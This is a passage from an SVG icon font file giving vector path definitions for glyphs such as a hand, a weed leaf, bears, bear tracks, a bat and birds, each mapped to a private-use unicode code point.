11-2 9-12-7-31-27-50-55-51z m102 579c0-15-2-32-15-36-11-4-18 13-26 21-1 1-1 2-2 3-12 17-12 48-2 61 3 4 6 3 10 2 21-8 35-28 35-51z m137 98c-1-14-1-31-13-36-12-5-20 12-28 21-15 18-14 39-7 60 3 9 8 9 15 5 20-11 33-26 33-50z m-145-575c-16-1-30 5-42 17-7 8-19 20-14 28 6 9 22 12 34 11 18-2 32-11 40-27 12-22 8-29-18-29z m56 538c30-1 53-24 52-52 0-6 0-12-9-12-28 0-52 16-59 42-5 18-3 22 16 22z m-64-648c0 27 13 45 37 56 7 3 9 1 13-4 15-26 1-61-28-69-19-5-22-2-22 17z" />
<glyph glyph-name="triangle" horiz-adv-x="1000" unicode="&#xe825;" d="M757 574l179-180v360l-179-180z m154-211l-184 182-190-188 183-184 191 190z m-3 425h-814l407-406 407 406z m-844-34v-814l405 407-405 407z m278-594h322l-161 161-161-161z m594-213v382l-190-191 190-191z m-633 173l-214-208h371l208 208h-365z m217-206h381l-191 190-190-190z" />
<glyph glyph-name="unity-hand" horiz-adv-x="1000" unicode="&#xe826;" d="M191 667c-4 11 5 21 16 19 3 0 7-1 10-2 20-8 40-15 60-22 14-5 29-11 44-15 9-2 18-6 27-8 3-1 7-1 10 1 3 1 4 4 1 6-5 6-12 11-19 15-5 3-9 6-13 9-15 9-31 17-47 26l-21 11-8 5-13 7c-8 4-8 14-4 20 5 7 10 8 18 7 7-2 13-6 20-10 15-7 30-15 44-23 13-7 26-13 39-20 10-5 19-9 30-12 2 0 4-1 5 1 1 2 0 4-1 5-6 6-11 12-16 17-4 3-7 6-11 9-8 7-15 15-24 21-3 3-6 6-9 9-7 6-15 12-21 19-6 6-7 14-4 20 3 5 10 7 15 5 4-1 7-3 10-6 7-5 14-11 21-16 9-6 17-12 25-19 11-8 22-16 32-26 7-7 15-13 24-19 11-7 23-10 36-14 10-2 20-6 30-10 10-4 18-9 27-14 9-5 16-12 24-19 8-7 16-15 19-27 1-5 1-9 0-14-2-9-5-16-10-23-8-9-9-20-12-31-2-8-2-16-3-24-2-13-8-23-17-31-9-9-19-15-29-22-5-3-10-6-15-9-7-4-15-5-23-5-11-1-21-3-32-8-7-3-13-8-19-12-6-5-13-8-20-9-9-1-17-6-24-11-5-4-10-7-15-10-6-2-13 3-14 10-1 10 4 18 10 25 6 9 15 13 24 16 5 1 9 4 12 7 9 7 18 14 27 20 2 1 5 2 8 3 10 5 8 11 4 19-2 3-5 5-9 7-8 3-16 8-24 13-10 7-21 11-33 11-9 1-18 3-27 4-13 2-26 1-40 2-13 1-27 2-41 4-12 1-24 2-36 4-9 1-15 6-14 16 1 7 8 14 17 13 13 0 27 0 43-1 21 0 46-2 70-2 7-1 14 1 19 5 6 3 6 9 1 14-2 2-5 3-8 5-11 4-22 9-34 13-17 5-32 13-48 18-8 3-16 7-24 10-7 3-15 5-22 9-5 2-10 4-14 8-2 1-4 3-4 6z m251-469c-2 5-6 10-9 15-6 7-11 15-12 24-1 7-4 14-9 20-4 6-9 12-12 20-5 10-6 20-7 31-1 8-2 16-6 23-2 5-6 10-9 15-6 10-13 21-22 30-8 9-18 15-30 16-10 1-19 2-28 4-10 2-20 4-28 11-6 5-13 8-20 10-10 2-19 0-27-5-8-5-15-10-20-18-5-7-11-13-16-20-4-9-10-17-13-26-4-11-9-22-12-33-2-8-3-17-7-24-7-13-16-25-26-36-15-16-27-34-40-50-1-2-2-4-3-5-7-7-12-15-18-22-2-3-3-6-5-10-1-4 1-10 4-13 6-4 15-4 20 1 5 5 10 10 15 15 6 9 13 16 20 24 8 10 18 20 26 30 5 5 10 9 15 14 1 1 3 3 5 1s1-3 1-5c-2-10-6-19-10-28-8-13-14-27-22-41-8-14-15-29-23-44-3-6-8-13-9-20-2-8-1-13 6-17 7-5 18-4 21 5 1 3 2 5 4 7 3 6 7 11 9 16 6 12 13 23 19 35 5 12 13 23 20 34 2 4 4 7 6 10 4 7 8 13 14 18 3 2 5 1 7-2 1-2 1-6 0-8-2-10-5-20-8-30-7-21-14-43-23-64-3-8-5-17-9-26-2-6-5-13-7-20-2-12 3-18 16-19 4 0 7 1 10 4 3 4 5 9 7 13 6 15 12 29 17 44 7 17 14 34 20 51 3 11 8 21 12 31 2 4 3 8 6 12 5 5 11 5 15-2 4-5 5-11 5-18-1-25-3-49-3-71-1-16-1-29-1-42-1-1 0-3 0-5 2-8 8-12 16-13 7 0 12 7 13 13 2 13 3 25 4 38 2 13 3 26 4 40 1 13 0 27 2 40 1 9 4 17 4 26 0 13 4 25 11 35 6 8 10 16 14 25 1 3 4 6 7 7 7 4 13 7 18-3 1-3 2-6 3-9 6-8 12-17 19-25 4-3 6-8 8-13 3-9 7-18 15-25 8-5 16-10 26-9 6 0 12 7 10 13z m364-159c-5 3-10 6-15 8-7 3-14 6-22 9-8 3-16 7-24 10-16 5-31 13-47 18-11 3-21 8-32 12-4 2-8 3-11 6-5 5-5 10 1 14 5 4 12 6 19 5 24-1 49-2 74-2 12-1 25-1 38-2 4 0 8 1 12 4 8 5 10 20-1 24-3 2-7 2-10 3-11 1-21 2-32 3-14 1-27 3-40 4-14 1-28 0-41 2-9 1-17 3-26 4-12 0-23 3-33 10-9 5-18 11-28 15-4 2-7 6-9 11-2 6-1 10 5 13 3 1 6 2 9 4 9 6 18 12 26 20 4 3 8 5 12 7 10 3 19 7 25 15 6 8 10 15 10 25 0 9-8 13-16 10-5-3-9-6-14-9-7-5-14-10-24-11-7-1-13-4-19-8-5-5-11-9-18-13-10-5-22-7-33-7-8-1-16-2-23-6-6-2-10-6-15-9-11-7-21-14-30-22-9-8-14-18-16-30-1-8-2-16-3-25-3-11-4-22-12-31-5-7-9-15-10-23-1-5-1-9 0-14 3-12 11-20 19-27 8-7 15-14 24-19 9-4 17-10 26-13 11-4 21-9 32-11 12-3 24-7 35-14 9-6 17-12 25-19 10-10 21-18 32-27 8-6 17-13 26-20 10-6 18-15 29-20 5-2 12 1 15 6 3 6 2 14-3 19-6 6-11 11-17 16-5 3-8 8-13 11-9 6-16 14-24 21-8 7-17 15-24 23-2 2-4 4-5 6-1 3-1 4 2 4 1 0 3 0 4 0 10-2 19-6 28-11 13-7 27-14 40-21 14-8 29-15 44-23 7-3 13-8 21-10 8-1 12 0 17 7 5 7 4 17-6 21-2 0-3 1-4 2-11 8-24 13-35 20-18 10-35 19-52 29-3 2-6 4-9 6-7 4-13 9-19 15-3 3-2 5 1 7 3 1 6 1 9 0 10-2 20-5 30-8 21-7 43-15 64-23 9-3 17-5 26-9 7-3 14-6 21-7 5-1 10-1 13 4 4 4 6 10 4 16 0 2-2 4-3 5z m127 506c-7 4-16 4-21-2-6-6-11-11-16-17-3-5-8-8-11-13-6-9-14-16-21-24-7-8-15-17-23-24-2-2-4-4-6-5-3-1-4 0-4 3 0 1 0 2 0 3 2 10 6 20 11 29 7 13 14 26 21 39 8 14 15 30 23 45 3 6 8 12 9 20 2 8 1 13-6 17-7 5-18 4-21-6-1-2-2-4-3-6-3-5-7-11-10-17-6-12-13-24-19-36-6-11-13-21-19-32-2-3-4-5-6-9-4-7-9-13-15-19-2-2-5-2-6 1-2 3-2 6-1 10 2 9 5 19 8 28 8 24 17 47 25 71l9 26c2 5 4 10 5 16 2 11-8 20-20 17-2-1-4-2-5-4-3-4-6-8-8-13-6-14-12-29-17-44-6-17-14-33-20-51-4-12-9-23-14-35-1-3-2-6-5-8-4-5-10-4-14 1-4 6-5 12-5 19 1 24 3 49 3 75 0 11 1 24 1 36 0 2 0 4 0 7-2 8-8 12-15 13-8 0-13-7-14-13-1-7-2-14-3-22-2-18-4-37-5-56-1-13 0-26-2-39-1-9-3-17-4-26 0-15-5-28-13-40-5-6-8-12-11-19-1-4-4-7-7-9-7-4-14-7-19 4-1 2-2 5-3 8-6 9-13 17-20 26-3 3-5 7-7 12-3 9-7 18-15 25-8 5-15 10-25 9-8 0-13-8-11-14 3-5 6-10 10-15 5-7 10-15 11-24 1-7 4-13 9-19 5-8 11-15 14-23 3-10 5-19 5-29 1-8 2-16 6-23 3-5 6-9 9-14 7-11 13-21 22-30 8-9 18-15 31-16 8-1 16-2 24-4 12-2 23-5 33-12 5-5 11-7 18-9 10-3 19-1 27 4 12 7 21 18 29 29s15 22 20 35c4 11 9 22 11 34 3 12 7 23 14 34 5 9 11 17 18 24 10 10 19 21 27 32 6 8 13 16 19 25 5 7 11 15 17 22 2 3 3 6 4 9 2 4 1 11-3 13z" />
<glyph glyph-name="weed" horiz-adv-x="1000" unicode="&#xe827;" d="M902 254c12 9 24 18 36 26l-32-2 2 7-15-12 0 9-19-9-3 7c0-1 0-1 0-1l-1 3-14-14-1 10 0 0-1 5-16-19-2 16-19-18-1 10-15-21-5 11-12-16-3 10-16-17c-1 4-2 6-3 7-5-4-10-8-15-13l-4 7-15-17-1 9c-5-6-10-11-15-16l-3 6-17-21c-1 4-2 6-3 10-6-8-11-14-17-21l-4 5c-6-7-11-13-17-20-1 3-2 4-3 8-6-7-11-13-15-19l-3 8-10-14-9-11-3 4c-25-32-54-61-89-83-1 1-1 2-1 3 11 22 73 86 117 119-1 2-3 3-5 4 6 4 11 8 17 11l19 12-14 1 33 18-4 2c0 0 0 0 0 0l-10 4 26 20-8 4c10 8 20 14 31 22-5 2-8 4-11 5 9 7 18 13 28 20l-9 5 21 15-7 6c7 6 13 11 20 17-4 2-7 3-10 4 8 7 15 13 23 19v0l2 1-14 3c8 7 15 13 23 20l-10 4c6 5 12 10 19 17l-11 4c2 2 5 4 7 6l17 15-3 0-11 2 23 22-16 1c5 5 9 8 13 12l13 12h-19l17 22-11 3 4 5 18 21-12 1 26 60-43-32c-1-1-1-1-2-2l-4-3c-3 3-6 9-6 9l-14-29c-1-2-2-4-3-6l-8 9c-4-8-7-16-10-25l-11 14c-3-10-5-18-8-28l-10 10c-3-10-6-19-9-29-2 3-5 6-8 11-3-11-6-20-9-30l-8 8c-2-9-4-17-7-26l-4 9-4-1-6-28-2-3-4 10-4 0-7-27-8 7c-2-9-4-17-6-26l-7 4c-1-5-3-9-4-14 0-4 0-10-7-8-1 0-4-4-4-7-2-8-3-16-4-25-4 2-5 4-10 7-2-12-3-24-5-36l-8 3c-2-10-4-19-7-30l-7 5c-2-11-5-21-7-30l-9 6-2-38h-7c-6-55-22-108-49-158-1 1-2 1-3 1 5 56 18 109 38 161l14 24h-12l24 40-15-5 12 34h-11c4 11 9 22 13 33l-11 1c4 13 8 22 14 37-3 0-5 0-10 0 5 11 9 22 14 33l-9 2c2 9 5 18 8 27l-8 0c3 10 5 18 8 28-5-1-8-1-12-2 4 11 7 21 11 32l-15-3 12 32c-6-2-10-3-14-4l10 28c-6-1-9-1-13-2l10 33-14-4 8 33c-5-2-10-4-16-7 4 12 7 21 10 31l1 4-20-8c2 10 4 19 6 29l-16-4c2 11 4 17 7 31l-13-3v21l-7-10-9 51-8-51-8 10v-21l-13 3c4-14 5-20 8-31l-16 4c2-10 3-19 5-29l-20 8 2-4c3-10 6-19 10-31-7 3-11 5-17 7l8-33-14 4 11-33c-5 1-8 1-14 2l11-28c-5 2-8 2-14 4l11-32-15 3c4-11 8-21 11-32-4 1-7 1-12 2 3-10 6-18 9-28l-8 0c2-9 5-18 8-27l-9-2c4-11 9-22 13-33-4 0-7 0-10 0 6-15 10-24 14-37l-11-1c5-11 9-22 14-33h-12l13-34-16 5 24-40h-12l14-24c20-52 33-105 38-161-1 0-2-1-2-1-27 49-43 102-50 158h-7l-1 38-10-7c-2 10-4 20-7 31l-7-5c-2 10-4 20-7 30l-7-3c-2 12-4 23-6 36-4-3-6-5-9-7-2 9-3 17-4 25-1 2-3 7-4 6-8-1-7 4-8 9-1 4-2 9-4 13l-6-3c-2 8-4 17-7 25l-8-6-7 27-3 0-5-10-2 2-6 28-3 2-5-9c-2 9-4 17-7 25l-7-8c-3 11-6 20-9 31-4-5-6-8-9-11-3 10-5 19-8 29l-10-10c-3 10-6 18-8 28l-11-14c-4 9-7 16-10 25l-9-10c-1 3-2 5-3 7l-13 29s-3-6-6-9l-5 3c0 1-1 1-2 2l-42 32 25-60-11-1 18-21 4-6c-5-1-8-1-11-2l17-22h-20l13-12c4-4 8-8 13-12l-16-2 23-21-10-2-4-1 17-14c3-2 5-5 8-7l-12-4c7-6 13-11 20-16l-10-4c8-7 14-13 22-20l-13-3 2-2v0c7-6 14-11 22-18-3-1-6-3-9-4 6-6 13-12 20-18l-7-5 20-15-8-5c10-7 18-13 28-20-4-2-6-3-11-5 11-8 20-15 31-22l-8-4 26-20-11-4c0 0 0 0 1 0l-4-2 33-18-15-2 20-11c5-4 11-7 17-11-2-2-4-3-6-4 45-34 107-97 118-119-1-1-1-2-1-3-35 22-64 50-90 83l-3-5-9 12-9 13-3-7c-5 5-9 12-15 19-2-4-2-6-3-8-6 7-12 13-17 20l-4-5c-6 6-12 13-18 20-1-4-1-6-2-9l-18 21-3-6c-5 5-10 10-15 15l-1-8-14 16-5-6c-5 4-10 9-15 13-1-2-1-4-3-7l-16 16-3-9-12 16-4-11-16 21-1-11-19 19-2-17-16 20 0-5-1 0 0-11-15 15-1-3c0 0 0 0 0 0l-3-6-19 8 1-8-16 11 2-7-31 3c11-9 23-18 35-27l-4-5c6-3 11-5 17-8l-5-6 17-7c-2-4-4-6-6-9 0 0 18-6 18-6l-8-6 24-6c-1-3-3-4-5-7l22-5-5-6 18-4-3-7 17-4-4-9 21-1 4 0-5-8 17-4-11-8 25 2-7-8c1 0 23-2 23-2l13-1-8-10 28 1-8-8c1 0 24-1 24-1l9-1-3-6c9-1 17-2 22-3l-4-4 9-1c1 0 1 0 1 0 2-1 4-1 6-1l-1-4 14 3-4-4 18 0c31-5 61-15 90-27-2-2-4-3-6-3-13 1-26 3-39 4-6 1-13 1-20 1l-15 1-12 3-5-4-11 4-6-6-9 4-4-7-9 6-2-6-8 4-3-8-12 3 2-9-15 7 3-10-12 5v-9l-10 6-4-8s-9 1-11 2l0-7-12 0 5-8-13 1 4-8-16-1 5-6-9 0-30-25 20 3 4-5 9 4 3-8 6 5 6-8 7 8 0-9 13 4-1-7 12 6-2-9 16 9 2-5 10 7 4-7 17 9 4-8 9 10 6-7 6 11 7-6 7 10 2-6 12 10 0-6 10 11 3-6 5 8 4-3 6 10c0 0 1 0 1 0 8 4 17 7 25 12 19 10 37 20 57 30 0 0 1 0 1 0 1-2 2-5 4-7-39-17-72-39-96-72-10-14-17-31-20-41-1-4-2-7-4-10 12 4 25 7 36 13 10 5 19 13 28 21 9 9 19 18 26 28 9 12 16 26 24 39 3 5 7 11 11 17 1-1 2-2 4-2-6-38-9-75 6-112 15 37 12 74 7 112 1 0 2 1 3 2 4-6 8-12 11-17 8-13 15-27 24-39 7-10 17-19 26-28 9-8 18-16 28-21 11-6 24-9 36-13-1 3-2 6-4 10-3 10-10 27-19 41-25 33-58 55-97 72 2 2 3 5 4 7 0 0 1 0 2 0 19-10 37-20 56-30 8-5 17-8 25-12 0 0 1 0 1 0l6-10 4 3 5-8 3 6 10-11 1 6 11-10 2 6 7-10 7 6 6-11 6 7 9-10 4 8 17-9 4 7 10-7 2 5 16-9-2 9 12-6-1 7 13-4 0 9 7-8 6 8 7-5 2 8 9-4 4 5 20-3-30 25-8 0 4 6-16 1 4 8-13-1 5 8-12 0 0 7c-2-1-11-2-11-2l-4 8-9-6v9l-13-5 3 10-15-7 2 9-12-3-3 8-8-4-2 6-9-6-4 7-8-4-7 6-10-4-6 4-12-3c-5 0-10-1-15-1-7 0-14 0-20-1l-39-4c-2 0-4 1-6 3 29 12 59 22 90 27l18 0-3 4 13-3-1 4c2 0 4 1 6 1 0 0 0 0 1 0l9 1-4 4c6 1 14 2 22 3l-3 6c3 0 6 1 9 1l24 1c0 0-8 8-8 8l29-1-10 10 13 1 23 2c1 0-7 8-7 8l26-2-11 8 17 4-5 8 4 0 21 1-4 9 16 4-3 7 19 4-6 6 23 5c-3 3-4 4-6 7 8 2 15 4 24 6l-8 6s18 6 19 6c-2 3-4 5-7 9l17 7-4 6c6 3 11 5 16 8l-3 6z" />
<glyph glyph-name="woman-bird" horiz-adv-x="1000" unicode="&#xe828;" d="M937 551c-3-40-8-80-23-119-8-24-16-48-28-71-23-41-53-77-91-105-37-26-77-45-121-55 2 17 2 34 1 50 34 9 65 26 93 48 29 23 53 52 72 85 19 33 32 68 41 105 6 27 7 55 7 82l0 24c-2-4-11-13-13-15-24-22-52-37-82-49-28-11-57-18-86-26-36-10-74-18-108-35-4-2-8-4-11-5-12 14-26 26-40 37l0 0c33 16 68 27 103 39 48 16 96 30 142 52 42 20 79 44 112 76 5 5 12 11 17 19 6-16 9-33 11-48 5-30 5-59 4-89z m-312-285c-2 24-7 47-16 70-9 24-23 46-37 67 0 1-1 3-2 4-16 22-35 41-56 58-28 22-60 38-93 51-13 5-25 10-38 14l-97 32c-27 9-53 19-79 31-41 20-79 44-112 76-5 5-11 12-17 20-6-17-8-34-11-49-4-30-5-59-4-89 3-40 9-80 23-119 9-24 16-48 28-71 23-41 53-77 92-105 36-26 76-45 120-55-3 17-3 34-2 51-34 8-64 25-91 47-30 23-54 52-73 85-19 32-32 68-40 105-7 28-8 56-8 84v20l12-12c8-8 17-15 26-21 2-1 45-28 94-42 12-3 28-7 49-13 5-2 11-3 16-5 18-5 37-10 55-16 7-2 13-5 20-7l0 0c3-1 6-2 9-3l5-3 16-6 0 0 1-1h0c37-16 70-38 95-70 7-8 14-17 19-26 22-35 35-73 39-114s-2-82-18-121c-10-25-24-47-41-67-7-8-10-8-18 0-1 1-3 3-4 5-19 22-33 50-33 50-14 28-24 58-27 90-6 58 7 112 44 158-12 15-27 27-42 38-19-26-33-54-43-85-2-5-3-11-5-17-9-36-11-73-5-110 1-8 3-16 4-24 16-70 49-129 103-178 13-12 19-13 28-6 15 13 28 27 41 42 21 24 36 52 49 81 1 4 2 7 4 11 17 45 26 92 21 140 0 2 0 4-1 5z m-206 368c0 46 38 83 83 83s84-37 84-83-38-83-84-83-83 37-83 83z m44 0c0-22 18-40 39-40 22 0 40 18 40 40s-18 40-40 40-39-18-39-40z" />
<glyph glyph-name="bat" horiz-adv-x="1000" unicode="&#xe829;" d="M936 323c-1 13-4 26-8 39-9 29-23 56-39 81-13 19-27 36-42 53-17 19-36 36-56 52-3 2-6 4-9 7-2-3-3-6-5-9-10-19-23-38-38-54-17-18-37-33-62-41-15-5-31-7-48-5-23 2-44 9-63 20-2 1-3 2-4 5 0 8-2 16-4 24-1 1-1 2 0 3 11 15 15 32 14 50-1 5-2 11-3 16 0 1-1 1-2 1-2 1-4 1-7 1h-2c-5 0-11-1-16-3-8-4-15-9-22-16-1-1-3-3-5-4-1 0-3 1-6 1-8 1-17 1-26-1-2-1-3 0-4 1-6 6-13 12-21 17-5 2-11 4-17 5 0 0-1 0-1 0h-7c-2 0-3 0-4 0-1 0-2-1-2-2-3-9-4-17-4-26 1-15 5-29 15-40 2-3 3-6 2-10-2-6-3-13-4-19 0-1 0-2-1-2-14-11-29-18-47-22-11-3-23-4-35-2-18 1-35 7-50 16-15 8-28 19-40 31-20 18-36 40-51 63-2 2-2 2-3 0-21-18-39-39-56-60-19-24-36-50-50-77-16-30-28-61-36-94-2-7-3-15-4-23 0 0 0 0 0-1v-1c26 12 54 20 82 25 20 4 40 6 61 5 23-1 46-5 67-16 21-11 38-26 50-47 3-5 6-11 8-17 1-1 1-1 3 0 12 12 26 20 43 24 19 4 36 0 51-11 13-9 23-21 31-35 11-17 19-36 26-56 4-11 7-22 10-34 0 0 0 0 1-1 1 4 2 7 3 10 6 23 13 44 23 65 7 15 15 28 25 40 10 11 21 20 36 25 14 4 28 3 42-2 14-4 26-12 37-22 1-1 1-1 1 1 7 12 15 24 25 35 10 10 23 19 36 25 15 7 30 11 46 13 15 2 30 2 45 1 29-2 57-8 85-17 12-4 25-8 36-13 1-1 1-1 2-1v15c-1 5-1 10-2 14z" />
<glyph glyph-name="bear-face" horiz-adv-x="1000" unicode="&#xe82a;" d="M795 732c-67 0-122-45-136-106h-322c-15 61-71 106-135 106-77 0-140-62-140-139 0-53 31-101 77-124v-150c0-195 167-351 362-351s362 156 362 351v150c44 23 74 71 74 124-1 77-64 139-142 139z m-479-287c0 21 17 40 40 40s40-18 40-40c0-23-17-40-40-40s-40 17-40 40z m181-408c-72 0-133 78-133 173s59 174 133 174c75 0 134-79 134-174s-59-173-134-173z m143 368c-23 0-40 17-40 40 0 21 17 40 40 40 21 0 40-18 40-40 0-23-17-40-40-40z m-211-122c-12 0-23-6-27-16-4-11-2-23 6-30l68-69c12-11 31-11 42 0l69 69c7 7 11 19 6 30-4 12-16 16-27 16h-137z" />
<glyph glyph-name="bear-tracks" horiz-adv-x="1000" unicode="&#xe82b;" d="M895 428c-67 56-144 87-232 85-79-3-134-76-114-150 9-30 13-59 19-89 7-40 14-80 29-119 13-35 38-57 75-67 25-7 49-10 75-9 5 0 11 0 16 0 57 1 94 27 112 81 5 14 10 28 14 42 15 52 29 104 29 159 0 25-2 50-23 67z m-568-2c-79 0-149-29-212-75-20-15-30-35-32-58-1-18-1-36 1-54 8-62 26-121 46-179 5-14 13-26 24-36 28-26 61-35 101-32 5 0 12 0 20 1 100 7 121 41 140 111 16 59 22 120 37 179 6 21 3 44-5 65-21 55-65 78-120 78z m101 1c24 20 29 70 10 95-15 19-35 18-48-2-10-14-14-30-14-46 0-16 4-31 15-43 12-12 25-14 37-4z m160 81c13 0 22 8 28 20 14 24 9 63-9 84-11 12-27 13-39 2-13-12-17-27-17-44 0-15 3-30 11-43 6-10 13-20 26-19z m-272-65c17 0 31 19 34 41 0 2 0 3 0 5 0 14-7 34-16 44-12 12-26 13-37 0-13-15-19-33-14-53 5-23 18-38 33-37z m395 105c12 22 11 45-3 66-14 21-32 20-46 0-8-12-12-24-11-40-1-8 2-18 7-27 15-23 39-23 53 1z m-559-128c15-12 32-8 40 10 5 12 6 24 6 36-1 9-2 17-3 26 0 3-1 7-2 11-5 13-14 17-27 12-19-9-29-27-31-47-3-18 2-35 17-48z m757 129c-14 8-26 3-30-13-3-11-4-22-5-33 0-11 1-22 4-32s8-19 19-21c11-3 20 2 28 10 22 24 14 73-16 89z m-153-26c15-2 25 7 31 20 12 23 9 46-2 68-10 17-27 18-39 3-11-13-15-29-16-48 1-4 2-10 3-16 3-14 7-26 23-27z m-636-143c5 11 5 23 5 36-1 12 0 24-4 36-5 13-15 17-27 12-18-8-27-24-30-42-4-20-1-39 16-52 15-13 33-8 40 10z m733 131c22 25 14 74-16 89-14 7-24 3-30-12-4-11-3-22-4-34 1-11 0-22 3-33 9-23 30-28 47-10z m-628-70c16-10 32-6 39 11 4 9 4 19 5 28 0 18-3 34-15 48-9 12-21 13-32 5-18-14-25-73 3-92z m685 130c7 1 8 6 6 12-4 17-13 31-25 47 2-19 4-35 5-50 1-9 8-9 14-9z m-820-86c7-1 14 0 15 9 1 14 2 29 4 47-13-15-21-28-25-43-2-6-2-12 6-13z m320 63c8 1 8 7 6 14-4 14-12 27-25 43 2-19 4-33 5-47 0-10 7-11 14-10z m358 94c9 1 8 9 6 15-5 14-13 27-25 42 2-18 3-32 4-46 1-10 8-12 15-11z m-178-7c8-2 13 1 14 10 2 15 4 29 6 48-13-16-21-28-26-43-1-6-3-13 6-15z m-357-80c8-1 13 3 13 12 1 14 3 28 5 42-11-11-20-23-24-38-2-6-4-15 6-16z m-69-23c7-1 13 0 14 10 1 14 3 28 4 42-12-11-20-23-24-37-2-7-4-13 6-15z m672 86c10 2 8 9 6 15-4 15-13 28-25 43 2-18 5-32 6-47 0-9 5-12 13-11z m-526-55c5 0 12-1 12 7 0 16-3 33-7 49-6-15-11-30-13-46-1-6 1-11 8-10z m380 87c7 0 10 4 9 10-4 15-7 31-14 48-5-18-6-34-6-49-1-9 5-9 11-9z" />
<glyph glyph-name="bear" horiz-adv-x="1000" unicode="&#xe82c;" d="M888 383c8-17 10-33-8-46-22-17-37-7-52 10 4-23-8-25-25-17-17 7-28 39-19 56 7 12 19 20 33 19 18-2 8-17 9-27 1-3 1-6 1-9 2 17 12 30 30 34 15 3 25-8 31-20z m32 252c-5-9-8-19-11-28-7-18-18-29-40-25-15 3-32 4-49-7 6-2 10-2 14-3 12-3 33 0 33-14 0-17-20-21-35-23-73-8-102-66-134-118-15-23-4-48 12-69 15-21 35-38 54-55 27-24 42-55 44-92 1-36-13-52-49-59-36-6-70 9-73 40-4 43-31 62-62 83-54 35-72 90-74 160-26-54-19-105 21-146 24-24 18-38-6-50-37-17-51-40-45-83 6-40-11-80-37-112-20-25-12-33 13-42 15-4 28-13 38-25 12-14 9-25-10-27-38-3-76-3-114 5-30 6-48 61-28 84 24 29 45 59 58 94 21 58 3 118-51 160 82-136 5-221-88-305 20-10 42-13 58-28 8-7 16-15 14-26-4-12-17-10-26-10-26-1-52-2-77-1-63 3-99 47-85 108 9 39 8 73-20 105-11 13-18 30-23 46-8 26-15 48-48 54-20 3-23 29-3 40 32 16 44 43 55 74 8 23 24 40 45 52l63 39c52 32 97 68 118 129 28 81 86 129 173 142 22 3 43 12 65 17 21 5 40 6 33 39-5 25 21 29 41 30 22 0 43-7 39-33-4-25 8-30 26-34 16-4 32-9 48-13 20-5 31-16 36-37 8-31 34-38 60-17 7 5 13 11 22 5 9-6 9-14 5-24z m-232 43c-1 16-14 28-31 30-14 1-24-8-26-21-2-20 12-30 27-35 15-4 31 13 30 26z m103-36c-6 8-15 6-22 9-9 4-19 8-28-1-4-4-3-8 0-11 8-7 17-12 28-11 9 1 18 3 22 14z m83-324c-22 0-45 0-68 0 14-32 49-42 74-22 5 5 13 9 10 17-2 7-10 5-16 5z m-41 94c12 0 23 0 34 0 12 1 19 6 10 17-25 32-60 47-98 54-23 4-31-23-44-37-11-14-31-30-23-46 5-10 31-10 52-15 3-1 10 0 15 7 13 19 34 20 54 20z" />
<glyph glyph-name="bird-alt" horiz-adv-x="1000" unicode="&#xe82d;" d="M645 214c-82 111-191 179-327 204-26 5-53 6-79 8-8 1-11-2-10-10 2-44 6-87 19-129 60-191 187-312 381-362 29-7 58-11 86-12 29-2 29-2 27 31-6 99-38 190-97 270z m125 15c-2 72-36 127-93 169-50 37-107 53-168 56-6 0-10 0-10 8 4 90 30 172 98 235 14 13 31 21 49 29-34 33-73 54-118 60-97 11-170-31-227-105-43-56-64-121-70-191-1-5-2-10 7-10 117-7 222-45 316-114 99-73 170-168 211-285 1-3 1-8 6-11 0 54 1 107-1 159z m-291 472c0 15 13 28 28 28 15 0 28-13 27-27 0-15-12-27-27-27-15-1-27 12-28 26z m78-128c24 11 47 9 70 1 24-9 37-30 50-51 7 12 10 24 12 36 4 27 7 54-1 81-5 17-13 32-24 46-3 3-5 4-10 2-39-15-88-73-97-115z" />
<glyph glyph-name="bird-flying" horiz-adv-x="1000" unicode="&#xe82e;" d="M936-32c-10 33-17 59-33 90-15 29-27 59-45 86-14 21-24 44-35 66-7 12-12 24-26 29-12 5-25 9-37 13-6 3-12 5-18 7-5 2-9 3-14 5-24 9-48 20-69 35-14 9-27 20-40 30-6 5-8 9-5 17 2 5 1 11 2 17 0 6 1 13 2 19 1 3 4 6 7 7 6 3 13 5 19 9 11 5 16 4 25-4 2-1 5-3 7-3 7 3 8 10 8 16l0 1c0 4-1 7-3 10l-4 4c-2 2-5 3-7 3-2 1-4 1-6 2-1 0-3 0-4 0l-2 1c-1 0-3 0-4 0l-1 1c-1 0-2 0-3 1-4 2-8 5-11 11-2 3-5 7-9 8-18 8-37 8-54-2-9-6-16-13-24-20-15-13-30-15-43-6-11 9-22 17-31 27-14 16-28 33-38 52-18 30-33 62-49 93-2 4-4 8-7 10-16 10-31 21-47 29-23 12-48 21-71 34-25 14-53 21-80 30-17 6-35 8-52 15-22 8-43 19-65 29h-6c1-2 2-5 3-6 3-5 6-10 9-15 2-4 4-7 6-11 1-2 3-3 4-5 8-12 14-24 26-31 2-1 2-3 3-4 7-8 15-15 22-22 3-3 5-7 9-9 8-5 17-10 26-15 3-2 10-2 10-4 1-8 10-7 14-9 13-5 25-14 40-15 10-1 20-6 30-10 3-1 6-3 9-5 7-6 14-13 23-17 6-3 9-8 11-14l7-15c0-2 1-4 2-6 2-4 3-8 5-11 2-4 6-7 8-11 5-10 10-21 15-32l2-4c2-7 6-13 11-19l4-6c3-6 5-14 9-18 10-8 9-23 21-29 4-2 4-10 6-14 1-3 4-4 6-6 0-2 2-4 3-6 3-5 6-9 8-14l4-12c2-5 0-21-3-25-7-11-15-22-21-35-14-32-32-61-67-75-2-1-4-4-4-6 1-8 3-15 5-22-8-5-16-9-24-14 9-18 9-18 17-13 5-5 8-9 13-13 6 3 12 6 17 10l2 2c4 1 7 3 10 5 5 1 11 2 16 2 8 1 15 2 18 11 5 12 14 22 26 26 14 5 28 10 42 13 18 4 34 10 47 22 7 6 14 5 21 3 21-7 43-15 64-22 12-4 24-7 36-11 15-4 30-10 45-15 4-1 8-1 13-3 6-2 12-6 18-7 16-3 31-8 46-16 5-3 10-8 14-14 8-12 14-26 21-39 7-13 13-26 20-39 2-3 5-6 8-9 3-3 6-6 9-9 4-4 8-9 13-13 1-2 4-2 5-4 3-8 8-14 17-17 4-1 6-5 9-8 3-3 5-7 8-9 10-9 21-17 31-25 0-1 1 1 1 3 4-9 4 1 6 1 2-9 6-16 15-19 6-2 5 3 5 6-1 0-2 1-2 1z" />
